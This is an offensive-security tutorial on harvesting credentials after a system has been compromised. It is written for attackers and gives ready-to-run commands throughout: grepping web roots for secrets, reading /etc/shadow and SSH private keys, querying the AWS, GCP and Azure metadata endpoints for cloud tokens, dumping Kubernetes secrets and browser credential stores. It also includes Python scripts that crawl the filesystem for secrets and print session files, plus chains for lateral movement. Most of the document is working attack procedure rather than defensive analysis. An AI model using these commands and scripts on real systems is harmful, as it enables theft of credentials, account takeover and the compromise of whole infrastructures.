Credential harvesting in post-exploitation involves extracting usernames, passwords, tokens, API keys, session identifiers, and authentication artifacts from compromised systems, applications, or user environments. Once initial access is achieved—via SQLi, command execution, LFI→RCE, stolen sessions, or uploaded webshell—the attacker focuses on collecting every credential stored on the host or accessible through the application.
Harvested credentials enable lateral movement, privilege escalation, persistence, and deeper exploitation across infrastructure.
Credential harvesting targets:
-
databases
-
configuration files
-
environment variables
-
session stores
-
log files
-
browser storage
-
cloud metadata endpoints
-
SSH keys
-
token-based authentication systems
Attackers treat credentials as the primary post-exploitation resource.
High-Value Credential Targets
Database Credentials
Applications store DB credentials in:
config.php
settings.py
.env
application.properties
database.yml
config.json
These files often contain plaintext username/password pairs.
Once obtained, attackers access:
-
user tables
-
password hashes
-
financial records
-
admin tokens
-
internal data systems
API Keys
Targets include:
-
AWS access keys
-
GCP service accounts
-
Stripe/PayPal keys
-
Twilio/SMS API keys
-
GitHub tokens
-
internal microservice access keys
API keys lead directly to high-impact pivoting.
Session Tokens
Session files or cookies allow impersonation of users and admins.
Sources:
-
Redis session stores
-
JWTs in logs
-
PHP session files in
/var/lib/php/sessions -
Node.js session stores (MongoDB/Redis)
-
Browser cookies if attacker gains access to user environment
SSH Keys
Found in:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
Once acquired, attacker logs in to other servers.
Cloud Metadata Credentials
If SSRF or cloud access is available:
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Metadata returns temporary root-like cloud credentials.
Password Hashes
Attacker extracts:
-
bcrypt hashes
-
MD5/SHA1 weak hashes
-
PBKDF2/SHA256
-
NTLM hashes on Windows servers
Hash cracking yields plaintext passwords.
Configuration Secrets
Framework secrets, including:
-
JWT secret keys
-
Django SECRET_KEY
-
Flask secret keys
-
Rails secret tokens
-
encryption keys
These allow forging tokens or decrypting stored data.
Practical Credential Harvesting Techniques
Below are direct post-exploitation methods that attackers use in real environments.
Harvesting from Configuration Files
After gaining RCE or shell, search for files that contain secrets.
Practical Commands
grep -R "password" /var/www/
grep -R "DB_" /var/www/
grep -R "secret" /var/www/
grep -R "key" /var/www/
Search common frameworks:
/var/www/html/config.php
/config/settings.py
/.env
/app/config.json
/app/src/config.js
Example .env file:
DB_USER=root
DB_PASS=pass123
SECRET_KEY=abc123xyz
JWT_SECRET=myjwtkey
Multiple credentials in one file.
Harvesting from Databases
If DB credentials obtained, connect:
mysql -u root -p
psql -U postgres
mongo mongodb://user:pass@host:27017
Extract user hashes:
SELECT username, password FROM users;
Extract OAuth tokens:
SELECT token FROM oauth_sessions;
Extract session data:
SELECT session_data FROM sessions;
Harvesting Password Hashes
If file-based:
/etc/shadow
If inside DB:
SELECT password FROM users;
If application uses custom hashing:
-
extract salt
-
extract algorithm
-
replicate in cracking tool
Use hashcracking with automated tools:
hashcat -m <mode> hashes.txt wordlist.txt
Harvesting from Server Process Memory
If RCE allows memory access:
strings /proc/<pid>/environ
strings /proc/<pid>/cmdline
Environment variables often hold:
-
database passwords
-
AWS_ACCESS_KEY
-
JWT secret keys
Example environment variable dump:
export DB_PASSWORD="secret123"
export AWS_SECRET_ACCESS_KEY="AKIA...."
Harvesting from Environment Files
Linux:
cat /etc/environment
cat ~/.bashrc
cat ~/.profile
Docker:
cat /run/secrets/*
Kubernetes:
kubectl get secrets --all-namespaces
Harvesting from Logs
Web and application logs frequently leak credentials.
Search common log locations:
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/apache2/access.log
/app/logs/*.log
Look for:
-
Authorization headers
-
JWT tokens
-
API keys
-
password reset tokens
-
OAuth redirect leaks
Examples found in real logs:
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
X-API-Key: sk_live_abc123
token=reset_8s9df8sd7f
Harvesting Cookie / Session Data
PHP:
/var/lib/php/sessions/sess_xxx
Node.js express sessions stored in:
-
Redis
-
MongoDB
-
file-based
/tmp/sessions/
Django sessions:
SELECT session_data FROM django_session;
These contain user IDs, tokens, and full session states.
Harvesting Web Server Config
Extract secrets from server configs:
Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/
Apache
/etc/apache2/sites-enabled/
Look for:
-
backend service credentials
-
proxy_pass internal endpoints
-
auth_basic password files
Harvesting SSH Keys
Locate keys:
find / -name id_rsa 2>/dev/null
Extract:
cat ~/.ssh/id_rsa
cat ~/.ssh/authorized_keys
cat /root/.ssh/id_rsa
Use key to pivot to other servers.
Harvesting Cloud Secrets
If shell or SSRF:
AWS:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
GCP:
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Azure:
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token"
These responses contain full cloud access tokens.
Harvesting Browser Stored Credentials (if user environment compromised)
Chrome credential file location:
~/.config/google-chrome/Default/Login Data
Firefox cookies:
~/.mozilla/firefox/*.default-release/cookies.sqlite
These require post-exploitation access on user machines, not servers.
Harvesting Middleware or Microservice Credentials
Inspect:
-
.docker_pass -
docker-compose files
-
Kubernetes ConfigMaps
-
Service mesh config
-
API gateway configs
Example docker-compose:
environment:
- MONGO_USER=admin
- MONGO_PASS=12345
Harvesting Tokens From HTTP Headers
Use MITM or server logs to intercept:
Authorization: Bearer <token>
Cookie: session=xyz
X-API-KEY: abc123
Automated Credential Harvesting Scripts
Basic automated crawler:
import os
keywords = ["pass", "key", "secret", "token", "authorization"]
for root, dirs, files in os.walk("/"):
for f in files:
path = os.path.join(root, f)
try:
c = open(path).read().lower()
for k in keywords:
if k in c:
print("Found:", path)
except:
pass
Automated session file extractor:
import glob
sessions = glob.glob("/var/lib/php/sessions/*")
for s in sessions:
print(open(s).read())
Chaining Credential Harvesting
Credential harvesting is rarely the last step; it unlocks new attack paths.
Examples:
-
DB password → dump password hashes → crack → admin login
-
JWT secret key → forge tokens → gain admin access
-
SSH private key → login to internal servers → escalate
-
cloud keys → access S3 → download configs → exploit entire infrastructure
-
OAuth tokens → impersonate user → session takeover
Credential harvesting is the most important post-exploitation skill because it leads to persistent, reliable access.
Intel Dump
-
Credential harvesting targets DB credentials, API keys, SSH keys, JWT secrets, cookies, tokens, and cloud metadata.
-
Extract secrets from config files, logs, environment variables, session stores, browser storage, and process memory.
-
Use grep, find, and automated scripts to locate credentials rapidly.
-
DB access enables extracting hashes, tokens, and sensitive data.
-
Log files frequently leak Authorization tokens, API keys, reset tokens, and cookies.
-
SSH keys, cloud metadata, and JWT secrets provide strong pivoting paths.
-
Harvested credentials enable lateral movement, privilege escalation, and long-term persistence across systems.